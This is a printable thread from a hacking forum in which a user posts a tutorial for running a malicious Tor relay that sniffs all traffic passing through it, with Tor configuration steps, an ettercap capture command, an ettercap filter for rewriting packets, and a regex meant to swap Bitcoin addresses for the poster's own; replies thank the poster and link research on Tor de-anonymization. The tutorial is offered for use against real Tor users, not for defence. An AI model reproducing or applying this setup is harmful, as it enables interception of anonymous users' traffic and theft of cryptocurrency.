Tutorial Tor MiTM Relay - Printable Version

Tutorial Tor MiTM Relay - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Network Hacking (https://sinister.ly/Forum-Network-Hacking)
+--- Thread: Tutorial Tor MiTM Relay (/Thread-Tutorial-Tor-MiTM-Relay)

Tor MiTM Relay - Shiroi Õkami - 09-09-2020

So in light of recent events I thought I'd show you a quick way to setup a Tor MiTM Relay, this was done on Debian Buster (10.5)

Let's install Tor (You can get the latest packages by adding the Tor repo to your /apt/sources.list

Code:
apt update

apt install tor

When those packages have finished installing Tor will automatically start running so let's stop that

Code:
systemctl stop tor

Now remove the default Tor config

Code:
rm /etc/tor/torrc

Now create a new torrc file and paste the following

Code:
touch /etc/tor/torrc

Code:
SOCKSPort 192.168.0.1:9100 # Bind to this address:port too, default is 9050

ExitPolicy accept *:80-444

ExitPolicy reject *:82-6500

ControlPort 9051

HashedControlPassword 16:BE7C48D44CF26570606B3676D65DC5357788CC1CF14006B06F5BC2399D - DO NOT USE THIS PASSWORD!

Nickname YOURRELAYNAME - CHANGE ME

ORPort 9001

SocksListenAddress 127.0.0.1

Remember to change the HASHED CONTROL PASSWORD with the following and the Nickname with whatever you want

Code:
tor --hash-password YOURPASSWORD

Now we are ready to run Tor if you have kept your torrc file under /etc/tor/torrc this will be the default config now run the following (not as root!)

Code:
tor -f /etc/tor/torrc

Wait until Tor finishes connecting and open a new root terminal now it's time to install ettercap (You could probably use another tool if you wanted)

Code:
apt install ettercap

Now our relay is up and running so how do we start sniffing the traffic ? with one simple command

Code:
ettercap -T -w dump.pcap -E -i wlp2s0

This is now a Tor relay which is sniffing all the traffic going through it, you could probably add a filter to modify traffic on the fly. (Currently trying to get this working with a regex, if anyone has any ideas about this then send me a PM I've already got the filter ready just needs a little tweaking) The filter for replacing text is below adding something like this (^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$) to the script below would allow you to replace any Bitcoin address as yours (In theory)

Code:
##

#  This filter will replace certain words In tcp packet

#  requests befor forward the packet back to target host.

#  based on code from ALoR, NaGA & Morpheus

##

##########################

## Zap Content Encoding ##

##########################

# change target request to server

if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {

  if (search(DATA.data, "Accept-Encoding")) {

    replace("Accept-Encoding", "Accept-Rubbish!");

    msg("\n[test] host:127.0.0.1   [ ⊶  ]  found ☆");

    msg("[test] |_ packet Accept-Encoding zapped ✔\n");

  }

}

if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {

  msg("[test] host:127.0.0.1   [ <- ]  port:80 http ☆");

  if (search(DATA.data, "gzip")) {

    replace("gzip", "    "); # note: four spaces In the replacement string

  }

}

if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.dst == 80) {

  if (search(DATA.data, "deflate")) {

    replace("deflate", "       "); # note: seven spaces In the replacement string

  }

}

#####################

## Replace Content ##

#####################

# change server response to target

if (ip.dst == '127.0.0.1' && ip.proto == TCP && tcp.src == 80) {

  if (search(DATA.data, "hello")){

    replace("hello", "hello");

    msg("\n[test] host:127.0.0.1   [ ⊶  ]  found ☆");

    msg("[test] | status : string found in tcp packet ✔");

    msg("[test] |_info   : packet forward back to target ✔\n");

  }

}

RE: Tor MiTM Relay - mothered - 09-10-2020

Excellent tutorial.

I assume the process Is similar on the Windows platform when editing the Tor configuration file?

RE: Tor MiTM Relay - Shiroi Õkami - 09-10-2020

(09-10-2020, 04:07 AM)mothered Wrote: Excellent tutorial.

I assume the process Is similar on the Windows platform when editing the Tor configuration file?

Although I haven't tested it I do believe so it should be cross platform.

RE: Tor MiTM Relay - mothered - 09-10-2020

(09-10-2020, 08:50 AM)Shiroi Õkami Wrote: Although I haven't tested it I do believe so it should be cross platform.

No problem, appreciate your feedback.

My Tor file Is heavily configured, so I'll download a raw/default copy and test It on that.

RE: Tor MiTM Relay - Shiroi Õkami - 09-10-2020

(09-10-2020, 10:38 AM)mothered Wrote:
(09-10-2020, 08:50 AM)Shiroi Õkami Wrote: Although I haven't tested it I do believe so it should be cross platform.
No problem, appreciate your feedback.

My Tor file Is heavily configured, so I'll download a raw/default copy and test It on that.

I'm still trying to figure out how to add a BTC regex to the ettercap filter so that it will modify on the fly unfortunately still haven't been able to figure that part out yet

RE: Tor MiTM Relay - mothered - 09-10-2020

(09-10-2020, 10:55 AM)Shiroi Õkami Wrote: I'm still trying to figure out how to add a BTC regex to the ettercap filter so that it will modify on the fly unfortunately still haven't been able to figure that part out yet

I haven't looked Into It, so It'll be premature to suggest anything one way or the other.

RE: Tor MiTM Relay - Thelaughingman - 09-17-2021

Thanks for the tutorial it helped me personally to have a hands on approach setting this up in a vm to really understand the full process instead of just reading about it.

RE: Tor MiTM Relay - ConcernedCitizen - 12-30-2021

If anybody is interested, there are a few white papers on Tor de-anonymization as well. You should check out The Software Engineering Institute ("SEI") of Carnegie Mellon University (CMU). https://motherboard.vice.com/read/tor-attack-could-unmask-new-hidden-sites-in-under-two-weeks & Operation Onymous https://motherboard.vice.com/read/the-fbis-deep-web-raid-seized-a-bunch-of-fake-sites ... Just to start you out.

You can further research techniques on both de-anonymization using FOXACID, previously explained by Bruce Schneier. It's a large scale MITM (man-in-the-middle attack).

Then you can also look at technical writeups on browser-based attacks https://www.cs.utexas.edu/~ecprice/papers/tor.pdf and https://github.com/Attacks-on-Tor/Attacks-on-Tor

"The most commonly assumed threat is based on a passive adversary that can observe part of the Tor network and is able to compromise and operate his own onion routers. Such an attacker simply observes inputs and outputs of the network and correlates their patterns, so called traffic analysis. The attacker tries to measure similarities in the traffic that the client sends and the traffic that the server receives. Traffic analysis is commonly used in attacks on hidden services that try to de-anonymize users. Tor does not protect against a global passive adversary. Its focus is to prevent attacks where an attacker tries to determine in which points in the network a traffic pattern based attack should be executed. By making it difficult for an attacker to determine where to attack, a precision attack is difficult."

Also definitely check out this paper by the University of Colorado at Boulder https://mega.nz/file/WMVkHZxA#q1ufjGtpab1LB2sxfMufEzqS-oFwDWDcPd-L1FUNVf4

That's already days worth of research on the topic of attacking for in that paper alone. The GitHub link is extensive and you an go as far down the rabbit hole as you wish.